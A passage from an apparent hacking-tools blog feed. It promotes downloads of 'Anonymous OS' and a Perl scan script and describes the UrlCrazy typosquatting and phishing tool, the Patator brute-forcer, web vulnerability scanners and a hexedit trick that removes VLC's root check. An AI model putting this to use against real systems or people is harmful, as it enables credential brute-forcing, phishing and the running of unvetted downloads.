<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIOszABIL490z1hFrlPCf7t1ZbAOkY1Y4rHYJezGsf6UkTGAKV-HvYo5F-AumAAURsFF2PILRuR2cOAcOf8Qvohjc5VI9jhFQPgagebNhh2YtL1FasYhvD7AFZPslI8HRqere6u_3Ym_Y/s1600/anonymous-os.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIOszABIL490z1hFrlPCf7t1ZbAOkY1Y4rHYJezGsf6UkTGAKV-HvYo5F-AumAAURsFF2PILRuR2cOAcOf8Qvohjc5VI9jhFQPgagebNhh2YtL1FasYhvD7AFZPslI8HRqere6u_3Ym_Y/s640/anonymous-os.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Anonymous OS System pro hack</td></tr>
</tbody></table>
Uploaded by bond benz ( torrent file )<br />
password zip:www.pent-hack.blogspot.com<br />
Download <a href="http://www.mediafire.com/?v2uuv1uuvl954ck" target="_blank">Anon-os by benz</a></div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-9604827887679931572012-11-30T07:16:00.001-08:002012-11-30T07:16:06.006-08:00Viper Scan Script<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj934yJIlzGvQArPV-qopiZMRT7hp2FJIVJA2d6P78Z6hRVRKMWPXOdEUs3g1QDNtFQPhhyphenhyphenbN3dEREizJXIdrTBo5cgRQjagsBa3YW77XKUOGrYYb_FXoSkZkWhdlL2wTs5hGEfyuWZkYM/s1600/Capture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj934yJIlzGvQArPV-qopiZMRT7hp2FJIVJA2d6P78Z6hRVRKMWPXOdEUs3g1QDNtFQPhhyphenhyphenbN3dEREizJXIdrTBo5cgRQjagsBa3YW77XKUOGrYYb_FXoSkZkWhdlL2wTs5hGEfyuWZkYM/s640/Capture.png" width="640" /></a> #web http://pent-hack.blogspot.com<br />#Created: b4nz0k & ar3sw0rmed<br />#Edited: bENz</div>
<div class="separator" style="clear: both; text-align: left;">
#Format: Perl </div>
<div class="separator" style="clear: both; text-align: left;">
Download from <a href="http://www.sendspace.com/file/jz4obca" target="_blank">SendSpace</a> .</div>
</div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-55097518345830614062012-11-20T07:44:00.001-08:002012-11-20T07:55:00.253-08:00UrlCrazy tool<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
UrlCrazy<br />
<br />
Download:<a href="http://www.morningstarsecurity.com/downloads/urlcrazy-0.5.tar.gz" target="_blank">urlcrazy-0.5.tar.gz</a><br />
Latest Version: 0.5, July 2012<br />
License: Restrictive. See README file.<br />
Author: Andrew Horton (urbanadventurer)<br />
<br />
Introduction<br />
Generate and test domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage.<br />
<br />
Usage<br />
* Detect typo squatters profiting from typos on your domain name<br />
* Protect your brand by registering popular typos<br />
* Identify typo domain names that will receive traffic intended for another domain<br />
* Conduct phishing attacks during a penetration test<br />
<br />
Features<br />
* Generates 15 types of domain variants<br />
* Knows over 8000 common misspellings<br />
* Supports cosmic ray induced bit flipping<br />
* Multiple keyboard layouts (qwerty, azerty, qwertz, dvorak)<br />
* Checks if a domain variant is valid<br />
* Test if domain variants are in use<br />
* Estimate popularity of a domain variant<br />
URLCrazy requires Linux and the Ruby interpreter.<br />
<br />
<h4 style="text-align: left;">
<span style="color: blue;">Usage</span></h4>
<br />
<img height="340" src="http://www.morningstarsecurity.com/wp-content/uploads/2011/03/urlcrazy-usage.png" width="640" /><br />
<h4 style="text-align: left;">
<b><span style="color: blue;">Sample Report</span></b></h4>
<br />
<img src="http://www.morningstarsecurity.com/wp-content/uploads/2011/03/urlcrazy-screenshot2.png" /><br />
<span style="color: blue;">Types of Domain Variations Supported</span><br />
Character Omission<br />
These typos are created by leaving out a letter of the domain name, one letter at a time. For example, www.goole.com and www.gogle.com<br />
<br />
Character Repeat<br />
These typos are created by repeating a letter of the domain name. For example, www.ggoogle.com and www.gooogle.com<br />
<br />
Adjacent Character Swap<br />
These typos are created by swapping the order of adjacent letters in the domain name. For example, www.googel.com and www.ogogle.com<br />
<br />
Adjacent Character Replacement<br />
These typos are created by replacing each letter of the domain name with letters to the immediate left and right on the keyboard. For example, www.googke.com and www.goohle.com<br />
<br />
Double Character Replacement<br />
These typos are created by replacing identical, consecutive letters of the domain name with letters to the immediate left and right on the keyboard. For example, www.gppgle.com and www.giigle.com<br />
<br />
Adjacent Character Insertion<br />
These typos are created by inserting letters to the immediate left and right on the keyboard of each letter. For example, www.googhle.com and www.goopgle.com<br />
<br />
Missing Dot<br />
These typos are created by omitting a dot from the domainname. For example, wwwgoogle.com and www.googlecom<br />
<br />
Strip Dashes<br />
These typos are created by omitting a dash from the domainname. For example, www.domain-name.com becomes www.domainname.com<br />
<br />
Singular or Pluralise<br />
These typos are created by making a singular domain plural and vice versa. For example, www.google.com becomes www.googles.com and www.games.co.nz becomes www.game.co.nz<br />
<br />
Common Misspellings<br />
Over 8000 common misspellings from Wikipedia. For example, www.youtube.com becomes www.youtub.com and www.abseil.com becomes www.absail.com<br />
<br />
Vowel Swapping<br />
Swap vowels within the domain name except for the first letter. For example, www.google.com becomes www.gaagle.com.<br />
<br />
Homophones<br />
Over 450 sets of words that sound the same when spoken. For example, www.base.com becomes www.bass.com.<br />
<br />
Homoglyphs<br />
One or more characters that look similar to another character but are different are called homogylphs. An example is that the lower case l looks similar to the numeral one, e.g. l vs 1. For example, google.com becomes goog1e.com.<br />
<br />
Wrong Top Level Domain<br />
For example, www.trademe.co.nz becomes www.trademe.co.nz and www.google.com becomes www.google.org<br />
Uses the 19 most common top level domains.<br />
<br />
Wrong Second Level Domain<br />
Uses an alternate, valid second level domain for the top level domain.<br />
For example, www.trademe.co.nz becomes www.trademe.ac.nz and www.trademe.iwi.nz<br />
<br />
Bit Flipping<br />
Each letter in a domain name is an 8bit character. The character is substituted with the set of valid characters that can be made after a single bit flip. For example, facebook.com becomes bacebook.com, dacebook.com, faaebook.com,fabebook.com,facabook.com, etc.<br />
<br />
Tips<br />
The output will often be wider than the width of your terminal. If this bothers you, output your report to a file or increase the width of your terminal.<br />
<br />
Keyboard layouts supported are<br />
* QWERTY<br />
* AZERTY<br />
* QWERTZ<br />
* DVORAK<br />
<br />
Is the domain valid?<br />
UrlCrazy has a database of valid top level and second level domains. This information has been compiled from Wikipedia and domain registrars. We know whether a domain is valid by checking if it matches toplevel and second<br />
level domains. For example, www.trademe.co.bz is a valid domain in Belize which allows any second level domain registrations but www.trademe.xo.nz isn’t because xo.nz isn’t an allowed second level domain in New Zealand.<br />
<br />
Popularity Estimate<br />
We can estimate the relative popularity of a typo by measuring how often that typo appears on webpages. Querying goole.com for the number of search results for a typo gives us a indication of how popular a typo is.<br />
<br />
The drawback of this approach is that you need to manually identify and omit legitimate domains such as googles.com<br />
<br />
For example, consider the following typos for google.com.<br />
25424 gogle.com<br />
24031 googel.com<br />
22490 gooogle.com<br />
19172 googles.com<br />
19148 goole.com<br />
18855 googl.com<br />
17842 ggoogle.com<br />
<br />
IP Address<br />
An IP address for a typo domainname indicates it is in use.<br />
<b><br /></b>
<span style="color: blue;"><b>Video Tutorial:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/b2e9lakyE8I?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
Tip: An IP repeating for multiple typos or IPs in a close range shows common ownership. For example, gogle.com, gogole.com and googel.com all resolve to 64.233.161.104 which is owned by Google.<br />
<br />
Country Code Database<br />
http://en.wikipedia.org/wiki/Top-level_domain<br />
http://en.wikipedia.org/wiki/Country_code_top-level_domain<br />
2nd level domains here:<br />
http://www.iana.org/domains/root/db/<br />
<br />
See Also<br />
<a href="http://en.wikipedia.org/wiki/Wikipedia:AutoWikiBrowser/Typos">http://en.wikipedia.org/wiki/Wikipedia:AutoWikiBrowser/Typos</a><br />
<a href="http://en.wikipedia.org/wiki/Wikipedia:Typo">http://en.wikipedia.org/wiki/Wikipedia:Typo</a><br />
<a href="http://en.wikipedia.org/wiki/Typosquatting">http://en.wikipedia.org/wiki/Typosquatting</a><br />
<br />
Strider is tool with similar aims and is produced by Microsoft http://research.microsoft.com/csm/strider/<br />
<br />
Installation<br />
UrlCrazy requires Ruby version 1.8.x. Support for Ruby 1.9 is coming soon.<br />
If you are using Ubuntu or Debian try:<br />
$ sudo apt-get install ruby-1.8<br />
<br />
Appearances<br />
Steven Wierckx wrote an article about URLCrazy at www.ihackforfun.eu. Read Article<br />
<br />
Credits<br />
Authored by Andrew Horton (urbanadventurer). Andrew is a security consultant for Stratsec.net<br />
Thanks to Ruby on Rails for Inflector which allows plural and singular permutations.<br />
Thanks to Wikipedia for the set of common misspellings, homophones, and homoglyphs.<br />
Thanks to software77.net for their IP to country database.</div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-23177033633434727582012-11-17T05:48:00.000-08:002012-11-17T05:52:46.056-08:00Python Patator.py bruteforce<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.<br />
Currently it supports the following modules:<br />
* ftp_login : Brute-force FTP<br />
* ssh_login : Brute-force SSH<br />
* telnet_login : Brute-force Telnet<br />
* smtp_login : Brute-force SMTP<br />
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command<br />
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command<br />
* finger_lookup : Enumerate valid users using Finger<br />
* http_fuzz : Brute-force HTTP/HTTPS<br />
* pop_login : Brute-force POP<br />
* pop_passd : Brute-force poppassd (not POP3)<br />
* imap_login : Brute-force IMAP<br />
* ldap_login : Brute-force LDAP<br />
* smb_login : Brute-force SMB<br />
* smb_lookupsid : Brute-force SMB SID-lookup<br />
* vmauthd_login : Brute-force VMware Authentication Daemon<br />
* mssql_login : Brute-force MSSQL<br />
* oracle_login : Brute-force Oracle<br />
* mysql_login : Brute-force MySQL<br />
* pgsql_login : Brute-force PostgreSQL<br />
* vnc_login : Brute-force VNC<br />
* dns_forward : Brute-force DNS<br />
* dns_reverse : Brute-force DNS (reverse lookup subnets)<br />
* snmp_login : Brute-force SNMPv1/2 and SNMPv3<br />
* unzip_pass : Brute-force the password of encrypted ZIP files<br />
* keystore_pass : Brute-force the password of Java keystore files<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb7Js332d-IljKW25aVSf-dWPLL3CIlwbeKgZ9Ck0x-t2VBf1e1Cf3Xn_PIBcichLYyjK40NXjlH0RwhbC1uFr1tUQ4CBN14eR83crG5Fc6exBlPvbt4e2nMHqFs26GqEp-RHfgpA4mmU/s1600/patator-tool.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><b><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb7Js332d-IljKW25aVSf-dWPLL3CIlwbeKgZ9Ck0x-t2VBf1e1Cf3Xn_PIBcichLYyjK40NXjlH0RwhbC1uFr1tUQ4CBN14eR83crG5Fc6exBlPvbt4e2nMHqFs26GqEp-RHfgpA4mmU/s320/patator-tool.jpg" width="320" /></b></a></div>
<b>Exemple tutorial how to crack password zip with patator:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/fkRZNA5ic9o?feature=player_embedded' frameborder='0'></iframe></div>
<b>Patator.py <a href="http://code.google.com/p/patator/" target="_blank">WEBSITE</a></b><br />
group of The Linux FORCE <a href="http://www.facebook.com/groups/th3linuxf0rce/" target="_blank">http://www.facebook.com/groups/th3linuxf0rce/</a><br />
Page : <a href="http://www.facebook.com/BackTrack.linuxr3" target="_blank">http://www.facebook.com/BackTrack.linuxr3</a></div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-79773918557107968232012-11-15T02:51:00.000-08:002012-11-15T02:51:00.020-08:00How to install VLC on BT5 or Linux<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="background-color: white; clear: both; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHgoJIiA0FAld5w3XYF0hexlTLwCg4GFS6Hx8Y-sh50GSqOmF1c6493nE5-QdaTKNAnn6-LmkWmy9HV97_yuMSfu8vvFMhaFR2TTeJ29sKZRJAm485qnxF2vkmmiuSVtdK6Ucl4x5MIJ4/s1600/install+VLC+on+backtrack.png" imageanchor="1" style="color: #307192; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: initial;"><i><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHgoJIiA0FAld5w3XYF0hexlTLwCg4GFS6Hx8Y-sh50GSqOmF1c6493nE5-QdaTKNAnn6-LmkWmy9HV97_yuMSfu8vvFMhaFR2TTeJ29sKZRJAm485qnxF2vkmmiuSVtdK6Ucl4x5MIJ4/s400/install+VLC+on+backtrack.png" style="background-color: #f3f4f5; border: 1px solid rgb(227, 228, 229); margin: 0px 4px 4px 0px; padding: 6px;" width="400" /></i></a></div>
<div class="separator" style="background-color: white; clear: both; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: center;">
<b><span style="color: red; font-family: Arial, Helvetica, sans-serif;"><i>INSTALL VLC MEDIA PLAYER ON BACKTRACK </i></span></b></div>
<h4 style="background-color: white; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;">
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i><br /></i></span></b></span></h4>
<h4 style="background-color: white; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;">
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i>Hey Friends.. </i></span></b></span></h4>
<h4 style="background-color: white; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;">
<span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;"><i>Today We are going to Learn How To Intall VLC Media Player in BACKTRACK OS</i></span></span></h4>
<h4 style="background-color: white; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;">
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i>For That ! You must have an INTERNET Connection in BACKTRACK OS !</i></span></b></span></h4>
<h4 style="background-color: white; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;">
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i>If You Have Then Let's Start !</i></span></b></span></h4>
<h4 style="background-color: white; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;">
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i>Open Your Terminal IN BT OS !</i></span></b></span></h4>
<h4 style="background-color: white; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;">
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i>After that Type "<span style="color: #660000;"><u>apt-get install vlc</u></span>"</i></span></b></span></h4>
<h4 style="background-color: white; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;">
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i>After Downloading All the Packages Type this cmd in console ! "hexedit /usr/bin/vlc"</i></span></b></span></h4>
<h4 style="background-color: white; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;">
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i>then press [tab] to move the cursor over to the text section and find where it says</i></span></b></span></h4>
<h4 style="background-color: white; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;">
<span style="font-size: x-small;"><i><b><span style="font-family: Arial, Helvetica, sans-serif;">"<span style="color: #660000;"><u>geteuid._libc_start_man</u></span>" Just replace "</span></b><u><span style="font-family: Arial, Helvetica, sans-serif;"></span></u><b><span style="color: #660000;"><u><span style="font-family: Arial, Helvetica, sans-serif;">geteuid</span></u></span><span style="font-family: Arial, Helvetica, sans-serif;">" With "<span style="color: #660000;"><u>getppid</u></span>" then Press CLT+O</span></b></i></span></h4>
<h4 style="background-color: white; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;">
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i>Then Press "Y" for Confirmation ... Then Done !</i></span></b></span></h4>
<h4 style="background-color: white; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;">
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i> For Opening VLC Media Player Just Type "<span style="color: #660000;"><u>vlc</u></span>" In Terminal and you are done</i></span></b></span></h4>
<div>
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i>or Easy commands :</i></span></b></span></div>
<div>
<div>
sudo apt-get update</div>
<div>
sudo apt-get install vlc vlc-plugin-pulse mozilla-plugin-vlc</div>
<div>
hexedit /usr/bin/vlc</div>
<div>
To save the changes press F2</div>
<div>
After the install go to Applications/Sound $ Video/VLC media player.</div>
</div>
<div>
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i>See video !</i></span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/mGKGz-vH3ss?feature=player_embedded' frameborder='0'></iframe></div>
<div>
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i><br /></i></span></b></span></div>
<div>
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i><br /></i></span></b></span></div>
<div>
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i><br /></i></span></b></span></div>
<div>
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i><br /></i></span></b></span></div>
<div>
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i><br /></i></span></b></span></div>
<div>
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i><br /></i></span></b></span></div>
<div>
<span style="font-size: x-small;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><i><br /></i></span></b></span></div>
<div>
<div class="separator" style="background-color: white; clear: both; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: center;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><i>THANKS For Reading the Article ! </i></span></b></div>
<div class="separator" style="background-color: white; clear: both; color: #3a3636; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: center;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><i>IF YOU GOT THEN DON'T FORGET TO COMMENT</i></span></b></div>
</div>
</div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-74850820539738420962012-11-12T03:50:00.002-08:002012-11-12T03:50:32.766-08:00HOW TO Fix and Change ip of your linux<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNJVHxzn-QI8dyPVXVVAOI5oDe-3eLSSeCvy9R6OoHhaOOnQv8VdJSy6SAWG7CWGWlwX3ogOyqw1Tv3X2V1Z9b1NFAMwZbi-L-_aY1hSKwkL2CetmIWBKSSET_dU0QuAHQXglTj3swYUQ/s1600/ifconfig.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNJVHxzn-QI8dyPVXVVAOI5oDe-3eLSSeCvy9R6OoHhaOOnQv8VdJSy6SAWG7CWGWlwX3ogOyqw1Tv3X2V1Z9b1NFAMwZbi-L-_aY1hSKwkL2CetmIWBKSSET_dU0QuAHQXglTj3swYUQ/s320/ifconfig.png" width="320" /></a></div>
How to change and fix your ip adress of your linux use this command in console<br />
<br />
sudo ifconfig eth0 [ip what you need] netmask 255.255.255.0<br />
<br />
<br />
and reboot :)<br />
<br />
<br />
<br />
<br />
Video tutorial on facebook : <a href="http://www.facebook.com/photo.php?v=169560299853989" target="_blank">http://www.facebook.com/photo.php?v=169560299853989</a> </div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-7332171720521926842012-11-09T05:21:00.002-08:002012-11-09T05:25:16.842-08:00Golismero the WEB KNIFE<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicwuoB0TcKtJFZuN2IWDsp8EKIHXU44t9DXk3YGgpZT5McVDY10rmbd7f50xvqXRka56cUBRieNR-YxjhErcWfSyKKEBbuxaRW_PETNEkmWx8N-5Nxc-4ZoHI4xlPK0r8XqGMmwIB0wDg/s1600/28umy34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicwuoB0TcKtJFZuN2IWDsp8EKIHXU44t9DXk3YGgpZT5McVDY10rmbd7f50xvqXRka56cUBRieNR-YxjhErcWfSyKKEBbuxaRW_PETNEkmWx8N-5Nxc-4ZoHI4xlPK0r8XqGMmwIB0wDg/s320/28umy34.png" width="320" /></a></div>
<span style="font-family: arial, sans-serif; font-size: x-small;">GoLISMERO help you to map year web application, displaying as comfortable size for security auditor and Preparing Them for intergrate with other web hacking tools as w3af, wfuzz, netcat, nikto, etc.</span><br />
<span style="font-family: arial, sans-serif; font-size: x-small;">Features:</span><br />
<span style="font-family: arial, sans-serif; font-size: x-small;">Map a web aplication.</span><br />
<span style="font-family: arial, sans-serif; font-size: x-small;">Show all links and forms params as comfortable format.</span><br />
<span style="font-family: arial, sans-serif; font-size: x-small;">Save results with some formats: text, cvs, html, raw (for parsing with bash script) and wfuzz script.</span><br />
<span style="font-family: arial, sans-serif; font-size: x-small;">Detect VULNERABILITIES of common web application.</span><br />
<span style="font-family: arial, sans-serif; font-size: x-small;">Filter web information Retaining only what is important.</span><br />
<span style="font-family: arial, sans-serif; font-size: x-small;">Many other features you can find very useful.</span><br />
<span style="font-family: arial, sans-serif; font-size: x-small;">Downloads and information about the Web Golismero Knife Click Here.</span><br />
<div style="font-family: arial, sans-serif; font-size: small;">
<br /></div>
<br />
<span style="font-family: arial, sans-serif; font-size: x-small;">Video Tutorial :</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/PDIdANnG26I?feature=player_embedded' frameborder='0'></iframe></div>
</div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-78189784881625833222012-11-07T07:46:00.003-08:002012-11-07T07:49:41.317-08:00Grendel Web Vulnerability Scanner ON BACKTRACK<div dir="ltr" style="text-align: left;" trbidi="on">
<b><span style="font-size: large;"><span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="color: #333333;"><span style="font-family: Courier New, Courier, monospace; line-height: 18px;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTs4lH8fbqE35d81hJGV7e8n9po3far_d6Xit77bagcVvv8rsVk0LEOFZ030JOIJ2W_IyKqHAPHJU468FZEoCj8CoosB4-_HIuyJdv-nf9hRd7TPNEPKXBrgSxVHwSr8YYcBYdvCNtjE8/s1600/3307308.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTs4lH8fbqE35d81hJGV7e8n9po3far_d6Xit77bagcVvv8rsVk0LEOFZ030JOIJ2W_IyKqHAPHJU468FZEoCj8CoosB4-_HIuyJdv-nf9hRd7TPNEPKXBrgSxVHwSr8YYcBYdvCNtjE8/s320/3307308.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Grendel Web Vulnerability Scanner</td></tr>
</tbody></table>
</span></span></span></b><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>Description:</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>Grendel-Scan is an open source tool for testing the security of web applications. It incorporates modules for automated test to detect vulnerabilities classics which can be sensitive web applications, and its features are designed to assist in penetration testing manuals. The only pre-requisite system is the presence of Java 5 (minimum) versions of the tool are available for Windows, Linux and Macintosh.</b></span><br />
<b><span style="font-family: Courier New, Courier, monospace; font-size: large;"><span style="color: #333333;"><br /></span>
<span style="color: #333333;">Among the features offered by Grendel-Scan, here are a few:</span></span></b><br />
<b><span style="font-family: Courier New, Courier, monospace; font-size: large;"><span style="color: #333333;"><br /></span>
<span style="color: #333333;">Internal test proxy / interception</span></span></b><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>Fuzzer HTTP requests</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>manual queries</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>HTML authentication (form-based) multiple user accounts</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>Blocking parameters in queries</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>Whitelist and blacklist of URLs</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>names known session ID</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>In addition, it has modules for the following test:</b></span><br />
<b><span style="font-family: Courier New, Courier, monospace; font-size: large;"><span style="color: #333333;"><br /></span>
<span style="color: #333333;">SQL Injection</span></span></b><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>Error control</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>SQL tautologies (experimental)</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>CRLF injection</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>Cross-site request forgery</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>generic fuzzing</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>robots.txt</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>Cross-site tracing</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>...</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>Opinion of the contributor</b></span><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>Grendel-scan runs smoothly on the test platform. The test setup has no particular difficulty.</b></span><br />
<b><span style="font-family: Courier New, Courier, monospace; font-size: large;"><span style="color: #333333;"><br /></span>
<span style="color: #333333;">At the pertinence of the results, it varies depending on modules (little detection of SQL injection, XSS, for example) that still limits the interest of the scanner with respect to some of its "competitors".</span></span></b><br />
<b><span style="font-family: Courier New, Courier, monospace; font-size: large;"><span style="color: #333333;"><br /></span>
<span style="color: #333333;">Yellow on the report that is not "user-friendly" and no possibility to know at the beginning the different blocks that compose it. We also regret having to generate the report to view the results, because it is the only way of presentation.</span></span></b><br />
<b><span style="font-family: Courier New, Courier, monospace; font-size: large;"><span style="color: #333333;"><br /></span>
<span style="color: #333333;">However, we can use this tool consolidation results by example.</span></span></b><br />
<b><span style="font-family: Courier New, Courier, monospace; font-size: large;"><span style="color: #333333;"><br /></span>
<span style="color: #333333;">NB: It is possible to use Grendel-Scan as an application proxy classical capture, alteration, generation of HTTP requests.</span></span></b><br />
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: large;"><b>Commands :</b></span><br />
<b><span style="font-size: large;"><span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="color: #333333;"><span style="font-family: Courier New, Courier, monospace; line-height: 18px;">cd /pentest/web/grendel-scan</span></span></span></b><br />
<span style="color: #333333;"><span style="font-family: Courier New, Courier, monospace; font-size: large; line-height: 18px;"><b>/pentest/web/grendel-scan# ls</b></span></span><br />
